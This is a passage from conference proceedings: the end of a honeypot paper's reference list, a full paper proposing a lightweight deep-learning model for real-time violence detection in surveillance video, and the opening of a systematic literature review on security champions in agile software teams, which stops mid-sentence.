References 1. Al-Mohannadi, H., Awan, I., Al Hamar, J.: Analysis of adversary activities using cloudbased web services to enhance cyber threat intelligence - service oriented computing and applications. SpringerLink (2020). https://link.springer.com/article/https://doi.org/10.1007/ s11761-019-00285-7. Accessed 18 April 2022 2. Baser, M., Guven, E.: SSH and telnet protocols attack analysis using Honeypot Technique: analysis of SSH and telnet honeypot. IEEE Xplore (n.d.). https://ieeexplore.ieee.org/abstract/ document/9558948. Accessed 18 April 2022 3. French, D.: How to setup “Cowrie” - an SSH honeypot. Medium (2018). https://medium.com/ threatpunter/how-to-setup-cowrie-an-ssh-honeypot-535a68832e4c. Accessed 18 April 2022 4. Koniaris, I., Papadimitrious, G., Nicopolitidis, P.: Analysis and visualization of SSH attacks using honeypots. IEEE Xplore (n.d.). https://ieeexplore.ieee.org/document/6624967/. Accessed 18 April 2022 5. Corey, J.: Local Honeypot Identification. Wayback Machine (2004). https://web.archive.org/ web/20040825164022/http://www.phrack.org/unoffical/p62/p62-0x07.txt. Accessed 29 Sept 2022 6. Corey, J.: Advanced Honey Pot Identification and Exploitation. Wayback Machine (2004). https://web.archive.org/web/20040316120640/http://www.phrack.org/unoffical/p63/ p63-0x09.txt. Accessed 29 Sept 2022 7. Dornseif, M., Holz, T., Müller, S.: Honeypots and limitations of deception (2005). https:// dl.gi.de/bitstream/handle/20.500.12116/28613/GI-Proceedings.73-14.pdf. Accessed 29 Sept 2022 8. Oosterhof, M.: Cowrie/Cowrie: Cowrie SSH/telnet honeypot (2009). https://cowrie.readth edocs.io. GitHub. https://github.com/cowrie/cowrie. Accessed 18 April 2022
782
C. Hetzler et al.
9. 411Hall:. Obscurer/obscurer.py at master · 411hall/obscurer. GitHub (2017). https://github. com/411Hall/obscurer/blob/master/obscurer.py. Accessed 18 April 2022 10. McCaughey, R.: Deception Using an SSH Honeypot. Naval Postgraduate School (2017). https://faculty.nps.edu/ncrowe/oldstudents/17Sep_McCaughey.htm. Accessed 18 April 2022 11. Dahbul, R., Lim, C., Purnama, J.: Enhancing Honeypot Deception Capability Through Network Service Fingerprinting. Institute of Physics (2017). https://iopscience.iop.org/article/ https://doi.org/10.1088/1742-6596/801/1/012057/pdf. Accessed 29 Sept 2022 12. Cukier, M.: Study: Hackers attack every 39 seconds. Study: Hackers Attack Every 39 Seconds | A James Clark School of Engineering, University of Maryland (2007). https://eng.umd.edu/ news/story/study-hackers-attack-every-39-seconds. Accessed 18 April 2022 13. Statista Research Department: U.S. consumers who have experienced hacking 2018. Statista (2018). https://www.statista.com/statistics/938993/share-of-online-accounts-whichhave-been-hacked/. Accessed 18 April 2022
Human Violence Recognition in Video Surveillance in Real-Time Herwin Alayn Huillcen Baca1(B) , Flor de Luz Palomino Valdivia1 , Ivan Soria Solis1 , Mario Aquino Cruz2 , and Juan Carlos Gutierrez Caceres3 1
Jose Maria Arguedas National University, Apurimac, Peru {hhuillcen,fpalomino,isoria}@unajma.edu.pe 2 Micaela Bastidas University, Apurimac, Peru [email protected] 3 San Agustin National University, Arequipa, Peru [email protected]
Abstract. The automatic detection of human violence in video surveillance is an area of great attention due to its application in security, monitoring, and prevention systems. Detecting violence in real time could prevent criminal acts and even save lives. There are many investigations and proposals for the detection of violence in video surveillance; however, most of them focus on effectiveness and not on efficiency. They focus on overcoming the accuracy results of other proposals and not on their applicability in a real scenario and real-time. In this work, we propose an efficient model for recognizing human violence in real-time, based on deep learning, composed of two modules, a spatial attention module (SA) and a temporal attention module (TA). SA extracts spatial features and regions of interest by frame difference of two consecutive frames and morphological dilation. TA extracts temporal features by averaging all three RGB channels in a single channel to have three frames as input to a 2D CNN backbone. The proposal was evaluated in efficiency, accuracy, and real-time. The results showed that our work has the best efficiency compared to other proposals. Accuracy was very close to the result of the best proposal, and latency was very close to real-time. Therefore our model can be applied in real scenarios and in real-time. Keywords: Human violence recognition · Video surveillance · Real-time · Frame difference · Channel average · Real scenario
1
Introduction
Human action recognition is an area of great interest to the scientific community due to its various applications, such as robotics, medicine, psychology, humancomputer interaction, and primarily video surveillance. An automatic violence detection system could alert about an occurrence or a crime and allow actions to be taken to mitigate said occurrence. Therefore, it is essential to detect violent activity in real-time. Although the recognition of violence in videos has achieved c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 783–795, 2023. https://doi.org/10.1007/978-3-031-28073-3_52
784
H. A. Huillcen Baca et al.
many improvements, most works aim to improve performance in known datasets, but few aim at a real-time scenario. There are many techniques to detect violence in videos. The typical methods include optical flow [1–5]. When the optical flow is combined other methods: RGB frames as input, CNN variants of two streams (Two Stream) [6–10] and 3D CNN variants [11–14] achieve good results. Thus, the optical flow is a motion representation for video action recognition tasks. However, extracting the optical flow is time-consuming and inefficient for real-time recognition tasks. The most promising techniques are based on deep learning [12,15–19], which, unlike optical flow, uses neural networks as an extractor of characteristics, encoding, and classification; these techniques achieve better performance, reducing the computational cost of optical flow, but it is still heavy in terms of parameters and FLOPS, so applying them in a real scenario is still a challenge. We focused on recognizing human violence in video surveillance that can be applied in a real scenario. Classification models must identify human violence at the precise moment of occurrence, that is, in real-time. Thus, three objectives are proposed in our approach: 1. The model must be efficient in terms of parameters and FLOPs. 2. Good and cutting-edge accuracy results. 3. Minimum latency times that guarantee recognition in real-time. The motivation is that the main difficulty when processing videos is dealing with their high Spatio-temporal nature, this simple fact makes the video processing task computationally expensive even when short video clips are processed, given that they can contain a large number of images. Also, since there is a dynamic between the spatial content of consecutive frames, this creates a time dimension. How to describe spatial and temporal information to understand the content of a video remains a challenge. Our proposal assumes this challenge, to propose a model that contributes to the current state of the art. Another motivation is that, although there are different proposals for the recognition of human violence in video surveillance, most have focused on effectiveness, but not on efficiency. Thus, there are very exact models, but with high computational costs that could not be used in real scenarios and in real-time. Our proposal makes a contribution to the domain of video surveillance, since the installation of video surveillance cameras in the streets has become widespread worldwide, with the aim of combating crime, however, dedicated personnel are needed to physically observe the videos to identify some kind of violence; With our proposal, this activity will be carried out by the computer system that alerts the personnel about a violent human action in real time, in such a way to proceed with the corresponding action and mitigate the violent act, even saving lives. On the other hand, according to the objectives, the proposal makes a contribution to the state of the art with an efficient model in terms of number of parameters, FLOPs and minimum latencies. The pipeline of our proposal consists of two modules. The Spatial attention module (SA) extracts the map of spatial characteristics of each frame using
Human Violence Recognition in Video Surveillance
785
background extraction, RGB difference, and morphological dilation. The temporal attention module (TA) extracts characteristics from a sequence of three consecutive frames since violent acts have short periods of time and usually are punching, pushing, or kicking. We use the average of each RGB channel of three consecutive frames as input to a pre-trained 2D CNN network. The rest of the document deals with the related works that inspired the proposal, then shows the details of the proposal, and finally, the experiments and results.
2
Related Work
A key factor to achieving efficiency and accuracy in recognizing human violence is the extraction of regions or elements of the frames that involve a violent act; these regions considerably reduce the computational cost and provide better characteristics for recognition. This process is called spatial attention, and there are good proposals for it; thus, regularization and object detection methods are proposed [20,21] based on Persistence of Appearance (PA) and consists of recognizing the motion boundaries of objects making use of the Euclidean distance between two consecutive frames. We take this method into account as a spatial attention mechanism. Still, we consider these boundaries too sharp, so we add a process of dilating the boundaries through morphological dilation. The 2D CNNs are commonly used for spatial processing of images, that is, for processing along the width and height of the image; they have an adequate computational cost, but they cannot encode spatial information; therefore, they could not extract Spatio-temporal features from a video. A solution to this problem was a proposal based on 3D CNN [12], which takes several frames from end-to-end video as input to extract features. This proposal has good accuracy results, but unfortunately, it has a high computational cost and cannot be used in a real-time scenario. This problem of the inefficiency of 3D CNNs was addressed by various proposals, such as the combination of 3D CNN and DenseNet [26,30] and others such as R(2+1)D [23], and P3D [24], they replace the 3D CNN by the 2D CNN, achieving almost the same performance and with the advantage of having much lower parameters and FLOPs than the 3D CNN. Referring specifically to the recognition of human violence, currently, several works use 2D CNN, 3D CNN, and LSTM techniques [22,25–30]; a good approach was presented by Sudhakaran [18], uses the difference of frames as input of a CNN and combines with LSTM. Another group of works still uses optical flow in TwoStream models [12]. These approaches have greatly improved the performance of human violence recognition in videos but have not yet yielded results in a real-time scenario. The time attention module of our proposal is based on these approaches. It uses 2D CNN with a straightforward strategy: take every three frames and calculate the average of the three RGB channels in a single channel, so that the 2D CNN takes the three averages as if there were three channels, that is, we convert the
786
H. A. Huillcen Baca et al.
color information into temporary information, since the color is not essential when recognizing violence in a video. This strategy brings light to the model, which is our goal. Finally, as a summary of the state-of-the-art, Table 1 presents a comparison of the results of the efficiency-oriented proposals and Table 2 of the accuracyoriented proposals. Table 1. Comparison of efficiency-oriented proposals Model
#Params (M) FLOPs(G)
C3D [12]
78
40,04
I3D [14]
12,3
55,7
3D CNN end to end [26]
7,4
10,43
ConvLSTM [18]
9,6
14,4
3D CNN + DenseNet(2,4,12,8) [30] 4,34
5,73
Table 2. Comparison of accuracy-oriented proposals Model
3
Hockey (%) Movie (%) RWF (%)
VGG-16+LSTM [27]
95,1
99
–
Xception+Bi-LSTM [28]
98
100
–
Flow Gated Network [31]
98
100
87,3
SPIL [33]
96,8
98,5
89,3
3D CNN end to end [26]
98,3
100
–
3D CNN + DenseNet(2,4,6,8) [30] 97,1
100
–
Proposal
The proposal’s main objective is to achieve efficiency in FLOPs, adequate accuracy results, and obtain a latency that guarantees its use in real-time. For that an architecture composed of two modules is proposed, Fig. 1 shows the pipeline of the proposed architecture. Spatial Attention module (SA) receives T + 1 frames from the end-to-end original video. It calculates the motion boundaries of the motion object, eliminating regions that are not part of the motion (background) through the frame difference of two consecutive frames. Temporal Attention module (TA) receives T frames from the Spatial Attention module (SA) and creates Spatio-temporal characteristics maps for the recognition of violence, through the average of each frame channel and a pretrained 2D CNN.
Human Violence Recognition in Video Surveillance
787
Fig. 1. Pipeline of the proposed architecture
3.1
Spatial Attention Module (SA)
When recognizing human violence in a video, the movement characteristics of people are more important than the color or background of a given frame; therefore, our spatial attention module extracts the boundaries of moving objects from each frame, through three steps. See Fig. 2. 1. This module take T = 30 frames and performs a frame difference Dt of two consecutive RGB frames Xt , Xt+1 , calculating the Euclidean distance and then performing the sum for each channel. 2. The next step is to generate a spatial attention map Mt , applying two average pooling layers (Kernel 15, stride 1) and four convolutional layers with ReLU activation (Kernel 7, stride 1). 3. Finally, to extract the regions corresponding to the movement of objects, the module performs the Hadamard Product between Mt and the second frame Xt+1 .
3.2
Temporal Attention Module (TA)
Considering that human violence is mainly represented by movements of short duration, such as punches, knife blows, or kicks, we propose the temporary attention module that takes three consecutive frames through a 2D CNN. On the other hand, we know that a 2D CNN processes frames individually and would not be able to extract temporal features from a video. In contrast, a 3D CNN can process Spatio-temporal features of a video end-to-end; however,
788
H. A. Huillcen Baca et al.
Fig. 2. Mechanism of spatial attention module (SA)
it is too heavy in terms of parameters and FLOPS, making it unfeasible for our purposes. In this way, we take advantage of the fact that a 2D CNN processes three RGB channels of a single frame, so we propose to use the average of the three RGB channels (Xt , Xt+1 , Xt+2 ) of a single frame in a single channel (At ) to have the possibility that the 2D CNN can process three frames simultaneously, see Fig. 3. In other words, we use temporal information instead of color information. In addition, color has no significance in recognition of human violence. The 2D CNN network used in the proposal is the EfficientNet-B0 pretrained network; the choice is because this network takes as priority in minimizing the number of FLOPs in its model, which is consistent with our objective.
4
Experiment and Results
The evaluation of our proposal is made in terms of efficiency, accuracy, and latency, but before it describes the dataset used and the model’s configuration. The proposal results include a configuration with only the temporal attention module (TA). Results of the proposal considering another configuration are also included, where it includes only the temporary attention (TA) module. 4.1
Datasets
Several datasets are available; we take the most representative.
Human Violence Recognition in Video Surveillance
789
Fig. 3. Mechanism of temporal attention module (TA)
RWF-2000 [31] is the largest violence detection dataset containing 2,000 reallife surveillance images. With a duration of 5 s. We take RWF-2000 as the main reference because it has a greater number of videos and is very heterogeneous in its characteristics of speed, background, lighting, and camera position. Hockey [32] contains 1000 videos compiled from different images of ice hockey. Each video has 50 frames, and all the videos have similar backgrounds and violent actions. Movies [32] is a relatively smaller dataset containing 200 video clips at various resolutions. The videos are diverse in content, and videos with the “violent” tag are collected from different movie clips. 4.2 – – – –
Configuration Model
The source code implementation was based on Pytorch. The input frames were resized to a resolution of 224 × 224. The models were trained using Adam optimizer and a learning rate of 0.001. The batch size used was 8 due to the limitations of the Nvidia GeForce RTX 2080 Super graphics card; however, we suggest using a larger setting for higher cards. The number of input frames was set to 30, which must always be a multiple of 3 due to the nature of the temporal attention module (TA). – Number of epochs was 1000.
790
4.3
H. A. Huillcen Baca et al.
Efficiency Evaluation
To assess the efficiency of our proposal, we compute the number of parameters and FLOPs and compare them with results from other prominent proposals identified in the Related Works section. See Table 3. Table 3. Comparison of efficiency results with other proposals Model
#Params (M) FLOPs(G)
C3D [12]
78
40,04
I3D [14]
12,3
55,7
3D CNN end to end [26]
7,4
10,43
ConvLSTM [18]
9,6
14,4
3D CNN + DenseNet(2,4,12,8) [30] 4,34
5,73
Proposal SA+TA
5,29
4,17
Proposal TA only
5,29
0,15
It is observed that according to the number of parameters, 3D CNN+DenseNet (2,4,12,8) still exceeds our results, but by a slight difference. However, according to the FLOPs, there is a big difference, as the amount drops from 5.73 to 0.15; then it is concluded that our proposal has low complexity and is light in processing FLOPs. This means that our model is very efficient, has low complexity, and can be deployed on lightweight devices with little computational power. We consider that these results are a contribution to the state-of-the-art. 4.4
Accuracy Evaluation
To evaluate the quality of our proposal, the model was trained and tested with 5-fold cross-validation for the Hockey and Movie datasets. In contrast, for the RWF-2000 dataset, we separated it into 80% for training and 20% for testing. Subsequently, these results were tabulated and compared with the accuracy of other proposals in the related works section. See Table 2. To make a good evaluation, we took the RWF-2000 dataset as a reference, as it has a more significant number of videos and is more heterogeneous in its characteristics. According to the Hockey dataset, our result is only beaten by 3D CNN endto-end [26], which is good; on the other hand, according to the Movie dataset, the result achieved is the maximum; therefore, these results are cutting-edge and support the quality of our proposal. Finally, in the case of RWF-200, our result is very close to SPIL [33] due to a slight difference, which also confirms the quality of our proposal and a significant contribution to state-of-the-art.
Human Violence Recognition in Video Surveillance
791
Table 4. Comparison of accuracy results with other proposals
4.5
Model
Hockey (%) Movie (%) RWF (%)
VGG-16+LSTM [27]
95,1
99
–
Xception+Bi-LSTM [28]
98
100
–
Flow Gated Network [31]
98
100
87,3
SPIL [33]
96,8
98,5
89,3
3D CNN end to end [26]
98,3
100
–
3D CNN + DenseNet(2,4,6,8) [30] 97,1
100
–
Proposal SA+TA
97,2
100
87,75
Proposal TA only
97.0
100
86,9
Real-Time Evaluation
As far as we know, there is no formal method to measure if a model can be used in real-time; however, we are based on similar works [22,30], and we agree that this evaluation is made by measuring the processing time for every 30 frames since the speed of 30 FPS is taken as a reference. Table 5. Latencies of our proposal in Nvidia GeForce RTX 2080 super Model
Latency (ms)
Proposal SA+TA 12,2 Proposal TA only 10,8
Table 5 shows the result of this measurement with an NVidia GeForce RTX 2080 Super graphics card. If real-time is 0 ms, then the results show that both models are close to real-time. In other words, in a real scenario, our proposal takes 0.0122 s s and 0.0108 s s to process a video of 1 s duration. This demonstrates the efficiency and low latency to be used in real and real-time scenarios. In this section, we must compare the models of our proposal SA+TA and TA, respectively. The SA+TA model has a better accuracy result than TA but has higher FLOPs and higher latency; this model can be used in normal devices with good computational power. While the SA model has relatively lower accuracy results, it is pretty light in FLOPs and latency; therefore, it can be used in devices with light computing power.
5
Discussion and Future Work
Regarding the efficiency results and according to Table 3, our proposal: TA only, has the best result in terms of FLOPs, with a value of 0.15. This result is because
792
H. A. Huillcen Baca et al.
the temporary attention module (TA) replaces the use of 3D CNN with 2D CNN. The proposals based on 3D CNN, although they extract space-temporal features, but with a high computational cost; 2D CNN can extract spatial features, but not temporal features. However, using T+1 frames of a single channel as a result of the average of the RGB channels, and inserting it as temporary information to the 2D CNN, reduces the computational cost considerably, despite not having the best result in accuracy. Using the temporal attention module (TA) and the spatial attention module (SA) together makes the previous experiment improve the accuracy results, increasing the value by 0,2 0,85 for the Hockey and RWF datasets, respectively, while for the Movie dataset the result is maintained, See Table 4. This improvement is because the spatial attention module extracts regions of interest from each frame, eliminating the background and the color. However, the FLOPs are increased by 4,02, and the number of parameters remains at 5,29; showing that using both modules slightly improves accuracy but at a high cost in FLOPs. Our goal is to recognize human violence in video surveillance in a real scenario and in real-time; therefore, we propose to use only the temporal attention module (TA). In future works, we propose to replace the pretrained 2D CNN network with other proposals, such as the MovileNet versions, which could improve the number of parameters or the FLOPs. On the other hand, to improve the accuracy, other background extraction methods could be used without taking into account the pooling layers and the convolutional layers, because these layers generate the increase in FLOPs.
6
Conclusions
We propose a new efficient model for recognizing human violence in video surveillance, oriented to be used in real-time and real situations. We use a spatial attention module (SA) and a temporal attention module (TA). We demonstrate that extracting temporal features from a video can be performed by a 2D CNN by replacing the RGB color information of each frame with the time dimension. We show that our model has low computational complexity in terms of FLOPs, allowing it to be used in devices with low computational power, especially in real-time. Likewise, our model contributes to the state-of-the-art compared to other proposals. Our model is very light in terms of the number of parameters, slightly outperformed by 3D CNN+DenseNet, therefore, it is a stateof-the-art result. It was shown that the proposal has a latency close to real-time, resulting in 10.8 ms in processing 30 frames. Finally, we present two variations on our proposal: one for light devices in computational power (SA), and another for devices with better computational characteristics.
Human Violence Recognition in Video Surveillance
793
References 1. Gao, Y., Liu, H., Sun, X., Wang, C., Liu, Y.: Violence detection using oriented violent flows. Image Vis. Comput. 48–49(2015), 37–41 (2016). https://doi.org/10. 1016/j.imavis.2016.01.006 2. Deniz, O., Serrano, I., Bueno, G., Kim, T.K.: Fast violence detection in video. In: VISAPP 2014 - Proceedings 9th International Conference on Computer Vision Theory Applications, vol. 2, December 2014, pp. 478–485 (2014). https://doi.org/ 10.5220/0004695104780485 3. Bilinski, P.: Human violence recognition and detection in surveillance videos, pp. 30–36 (2016). https://doi.org/10.1109/AVSS.2016.7738019 4. Zhang, T., Jia, W., He, X., Yang, J.: Discriminative dictionary learning with motion weber local descriptor for violence detection. IEEE Trans. Circuits Syst. Video Technol. 27(3), 696–709 (2017) 5. Deb, T., Arman, A., Firoze, A.: Machine cognition of violence in videos using novel outlier-resistant VLAD. In: 2018 17th IEEE International Conference on Machine Learning and Applications (ICMLA), pp. 989–994 (2018) 6. Simonyan, K., Zisserman, A.: Two-stream convolutional networks for action recognition in videos. In: Advances in Neural Information Processing Systems, vol. 1, no. January, pp. 568–576 (2014) 7. Feichtenhofer, C., Pinz, A., Zisserman, A.: Convolutional two-stream network fusion for video action recognition. In: Proceedings of the IEEE Computer Society Conference on Computer Vision and Pattern Recognition, 2016, Decemeber 2016, pp. 1933–1941 (2016). https://doi.org/10.1109/CVPR.2016.213 8. Zhang, B., Wang, L., Wang, Z., Qiao, Y., Wang, H.: Real-time action recognition with deeply transferred motion vector CNNs. IEEE Trans. Image Process. 27(5), 2326–2339 (2018). https://doi.org/10.1109/TIP.2018.2791180 9. Wang, L., Xiong, Y., Wang, Z., Qiao, Yu., Lin, D., Tang, X., Van Gool, L.: Temporal segment networks: towards good practices for deep action recognition. In: Leibe, B., Matas, J., Sebe, N., Welling, M. (eds.) ECCV 2016. LNCS, vol. 9912, pp. 20–36. Springer, Cham (2016). https://doi.org/10.1007/978-3-319-46484-8 2 10. Zhu, Y., Lan, Z., Newsam, S., Hauptmann, A.: Hidden two-stream convolutional networks for action recognition. In: Jawahar, C.V., Li, H., Mori, G., Schindler, K. (eds.) ACCV 2018. LNCS, vol. 11363, pp. 363–378. Springer, Cham (2019). https://doi.org/10.1007/978-3-030-20893-6 23 11. Ji, S., Xu, W., Yang, M., Yu, K.: 3D convolutional neural networks for human action recognition. IEEE Trans. Pattern Anal. Mach. Intell. 35(1), 221–231 (2013). https://doi.org/10.1109/TPAMI.2012.59 12. Tran, D., Bourdev, L., Fergus, R., Torresani, L., Paluri, M.: Learning spatiotemporal features with 3D convolutional networks. In: Proceedings of the IEEE International Conference on Computer Vision, vol. 2015, pp. 4489–4497 (2015). https:// doi.org/10.1109/ICCV.2015.510 13. Qiu, Z., Yao, T., Mei, T.: Learning spatio-temporal representation with pseudo3D residual networks. In: Proceedings of the IEEE International Conference on Computer Vision, vol. 2017-October, pp. 5534–5542 (2017). https://doi.org/10. 1109/ICCV.2017.590 14. Carreira, J., Zisserman, A.: Quo Vadis, action recognition? A new model and the kinetics dataset. In: Proceedings - 30th IEEE Conference on Computer Vision and Pattern Recognition, CVPR 2017, vol. 2017-January, pp. 4724–4733 (2017). https://doi.org/10.1109/CVPR.2017.502
794
H. A. Huillcen Baca et al.
15. Dong, Z., Qin, J., Wang, Y.: Multi-stream deep networks for person to person violence detection in videos. In: Chinese Conference on Pattern Recognition, pp. 517–531 (2016) 16. Zhou, P., Ding, Q., Luo, H., Hou, X.: Violent interaction detection in video based on deep learning. J. Phys: Conf. Ser. 844(1), 12044 (2017) 17. Serrano, I., Deniz, O., Espinosa-Aranda, J.L., Bueno, G.: Fight recognition in video using Hough forests and 2D convolutional neural network. IEEE Trans. Image Process. 27(10), 4787–4797 (2018) 18. Sudhakaran, S., Lanz, O.: Learning to detect violent videos using convolutional long short-term memory. In: 2017 14th IEEE International Conference on Advanced Video and Signal Based Surveillance (AVSS), pp. 1–6 (2017) 19. Hanson, A., PNVR, K., Krishnagopal, S., Davis, L.: Bidirectional convolutional LSTM for the detection of violence in videos. In: Leal-Taix´e, L., Roth, S. (eds.) ECCV 2018. LNCS, vol. 11130, pp. 280–295. Springer, Cham (2019). https://doi. org/10.1007/978-3-030-11012-3 24 20. Ulutan, O., Rallapalli, S., Srivatsa, M., Torres, C., Manjunath, B.S.: Actor conditioned attention maps for video action detection. In: Proceedings of IEEE Winter Conference on Applcations of Computer Vision (WACV), pp. 516–525 (2020) 21. Meng, L., et al.: Interpretable spatio-temporal attention for video action recognition. In: Proceedings of IEEE/CVF International Conference Computer Vision Workshop (ICCVW), October 2019, pp. 1513–1522 (2019) 22. Kang, M.S., Park, R.H., Park, H.M.: Efficient spatio-temporal modeling methods for real-time violence recognition. IEEE Access 9, 76270–76285 (2021) 23. Tran, D., Wang, H., Torresani, L., Ray, J., LeCun, Y., Paluri, M.: A closer look at spatiotemporal convolutions for action recognition. In: Proceedings of IEEE/CVF Conference on Computer Vision Pattern Recognition, June 2018, pp. 6450–6459 (2018) 24. Qiu, Z., Yao, T., Mei, T.: Learning spatio-temporal representation with pseudo-3D residual networks. In: Proceedings of IEEE International Conference on Computer Vision (ICCV), October 2017, pp. 5534–5542 (2017) 25. Hanson, A., PNVR, K., Krishnagopal, S., Davis, L.: Bidirectional convolutional LSTM for the detection of violence in videos. In: Leal-Taix´e, L., Roth, S. (eds.) ECCV 2018. LNCS, vol. 11130, pp. 280–295. Springer, Cham (2019). https://doi. org/10.1007/978-3-030-11012-3 24 26. Li, J., Jiang, X., Sun, T., Xu, K.: Efficient violence detection using 3D convolutional neural networks. In: Proceedings of 16th IEEE International Conference on Advanced Video and Signal Based Surveillance (AVSS), September 2019, pp. 1–8 (2018) 27. Soliman, M.M., et al.: Violence recognition from videos using deep learning techniques. In: Proceedings of 9th International Conference on Intelligent Computing and Information System (ICICIS), December 2019, pp. 80–85 (2019) 28. Akti, S., Tataroglu, G.A., Ekenel, H.K.: Vision-based fight detection from surveillance cameras. In: Proceedings of 9th International Conference on Image Process. Theory, Tools Application (IPTA), November 2019, pp. 1–6 (2019) 29. Traor´e, A., Akhloufi, M.A.: 2D bidirectional gated recurrent unit convolutional neural networks for end-to-end violence detection in videos. In: Campilho, A., Karray, F., Wang, Z. (eds.) ICIAR 2020. LNCS, vol. 12131, pp. 152–160. Springer, Cham (2020). https://doi.org/10.1007/978-3-030-50347-5 14
Human Violence Recognition in Video Surveillance
795
30. Huillcen Baca, H.A., Gutierrez Caceres, J.C., de Luz Palomino Valdivia, F.: Efficiency in human actions recognition in video surveillance using 3D CNN and DenseNet. In: Arai, K. (eds.) Advances in Information and Communication. FICC 2022. LNNS, vol. 438, pp. 342–355. Springer, Cham (2022). https://doi.org/10. 1007/978-3-030-98012-2 26 31. Cheng, M., Cai, K., Li, M.: RWF-2000: an open large scale video database for violence detection. arXiv preprint arXiv:1911.05913 (2019) 32. Bermejo Nievas, E., Deniz Suarez, O., Bueno Garc´ıa, G., Sukthankar, R.: Violence detection in video using computer vision techniques. In: Real, P., Diaz-Pernil, D., Molina-Abril, H., Berciano, A., Kropatsch, W. (eds.) CAIP 2011. LNCS, vol. 6855, pp. 332–339. Springer, Heidelberg (2011). https://doi.org/10.1007/978-3642-23678-5 39 33. Su, Y., Lin, G., Zhu, J., Wu, Q.: Human interaction learning on 3D skeleton point clouds for video violence recognition. In: Vedaldi, A., Bischof, H., Brox, T., Frahm, J.-M. (eds.) ECCV 2020. LNCS, vol. 12349, pp. 74–90. Springer, Cham (2020). https://doi.org/10.1007/978-3-030-58548-8 5
Establishing a Security Champion in Agile Software Teams: A Systematic Literature Review Hege Aalvik1 , Anh Nguyen-Duc1,2(B) , Daniela Soares Cruzes1 , and Monica Iovan3 1
Norwegian University of Science and Technology, Trondheim, Norway [email protected], [email protected] 2 University of South Eastern Norway, Bø i Telemark, Norway [email protected] 3 Visma, Timisoara, Romania [email protected]
Abstract. Security is increasingly recognized as an important aspect of software development processes. In agile software development, adoption of security practices is still facing a lot of challenges due to the perception and management of software teams. A security champion is an important strategic mechanism for creating a better security culture, however it is little known about how they can be achieved. In this paper, we present the results of a systematic literature review investigating approaches to establishing and maintaining a security champion in an organization with Agile teams. Gathering empirical evidence from 11 primary studies, we presented how security champion is characterized, the conditions for establishing and reported challenges in maintaining security champion programs. One of our main findings is a classification schema of 14 steps and 32 actions can be taken to establish a security champion program. The study has practical recommendations for organizations who want to establish or improve their security program in Agile teams. Keywords: Security champion
1
· Agile · Systematic literature review
Introduction
Software vulnerabilities continue to be the major security threats to softwareintensive systems. Software vulnerabilities are often not discovered until late in the development cycle, causing delays, and insecure software [25]. Most organizations have implemented processes to find and fix such vulnerabilities, but developers are often not included. Typically, developers and security experts work on separate teams, often communicated via formal channels [25]. Developers reportedly lack security training and understanding, quite often resulting in insufficient assurance of security issues during software development [21]. In many cases, the developers also see the responsibility of security as belonging to others and avoid engaging if possible [25]. This is a common problem in many c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 796–810, 2023. https://doi.org/10.1007/978-3-031-28073-3_53
Establishing a Security Champion
797
software development companies and pose a challenge of coordinating and managing the security knowledge, roles and practices within a software team [13]. As a response to this issue, a increasing number of companies is employing a role so-called security champion in their software teams. A security champion is a member of the development team who serves as an advocate for security [25]. The champion is typically a developer with security interest who volunteers for the role [23]. Typical tasks can be to show the team how to use cryptography libraries, authentication functions, key management, and most importantly be a source of support for security functionality [13]. Because the security champion is a part of the development team, he/she can serve as an important liaison between the security specialists and the development team [25]. Having a security champion on a development team is proven to be an effective strategy for creating a better security culture within the team, and thus more secure software [9]. A security champions program is organizational initiative that improve security-related activiteis by drawing in stakeholders without formal cybersecurity experience. To date, very few research studies have been undertaken to explore the success factors of security champions [11]. Researchers have investigated security champions and their impact on security, yet few addresses how to successfully maintain a security champion in a team or how to establish a security champions program [13]. Therefore there is a need for also looking for similar approaches in other types of disciplines to better understand how to implement successfully security champions in the teams. This study aims at investigating the role of security champions, especially looking at the practical introduction and operation of security champions. We focus on the role in a Agile project and theories from other disciplines. We derive from the objective three research questions: – RQ1 - Is there a reportedly consistent view on security champion in Agile software teams? – RQ2 - What is reported from the software engineering literature about establishing and maintaining security champion roles in Agile software teams? – RQ3: Which challenges has been reported regarding the establishment and maintenance of security champion in Agile software teams? The contribution of this work is two fold, (1) a comprehensive classification framework of activities to build a security champion program, and (2) a stateof-the-art about conceptualization, implementations, challenges and practices of establishing security champion roles. The paper is organized as below, Sect. 2 presents related work, Sect. 3 is the research methodology, Sect. 4 reports the search results, Sects. 5 and 6 discusses and concludes the paper.
2 2.1
Related Work Security Challenges in Agile Teams
According to a literature study by Oueslati et al. [20], there are security challenges related to almost all the agile principles. The authors mentioned 13 issues,
798
H. Aalvik et al.
such as: security assessment favors detailed documentation, which goes against one of the four core values of Agile manifesto. Another issue is that testing is, in general, insufficient to ensure the implementation of security requirements. Another study by Riisom et al. [22] discovered that one of the most significant difficulties for security in agile is “ensuring agile uniformity of operations”. This implies that the security activities goes at the expense of the agile methods, which makes it complicated for the developers to implement the activities without abandoning agile principles. The second most noteworthy issue is “security that requires planning and design.” Because agile development emphasizes working software and quick reactions to change, thorough planning and detailed design will complicate the development process. It will be challenging to respond to change when the plan or design must be reexamined or altered to verify that security is still incorporated. Other issues mentioned in the paper are “time constraints”, “security is intangible”, “incomplete security needs”, “first-time integration of security”, “lack of security knowledge”, “security quality valued similarity to other characteristics”, and “motivation to continually correct security vulnerabilities”. These studies revealed that even though security is present in agile software development to some degree, there are multiple issues relating to different values, principles, technical and non-technical factors of the projects. Securities are also referred as “incomplete security”, “first-time security integration”, and “intangible security needs”. As we see, there are many things to consider when it comes to software security in agile development. Implementing a security champion might not solve all the issues presented but might help mitigate some problems. 2.2
The Champion Role and Security Champions
Several definitions of champions have been proposed in the literature. Jenssen et al. propose the following definition: “A champion is an individual that is willing to take risks by enthusiastically promoting the development and/or implementation of an innovation inside a corporation through a resource acquisition process without regard to the resources currently controlled” [14]. An innovation is defined as “the introduction of new things, ideas, or ways of doing something” [2]. Due to increased turbulence, complexity, and global competition in organization environments, there is a need for innovation to achieve competitiveness, survival, and profitability [17]. The goal of the champion is to draw attention to new ideas, needs, and possibilities and make organization members appreciate them [26]. Therefore the presence of a champion can be essential for successful innovations, and thus company competitiveness [14]. Typical personal characteristics for a champion are described in the literature as taking risks, being socially independent, and socially clever. In addition, the ability to gain respect, loyalty, and trust are emphasized. Good champions should be motivated by new technology and what it can do for the company [14]. One of the main tasks of a champion is to convince fellow employees who are skeptical towards an innovation. Therefore a champion should have the capability to inspire others to gain support for the 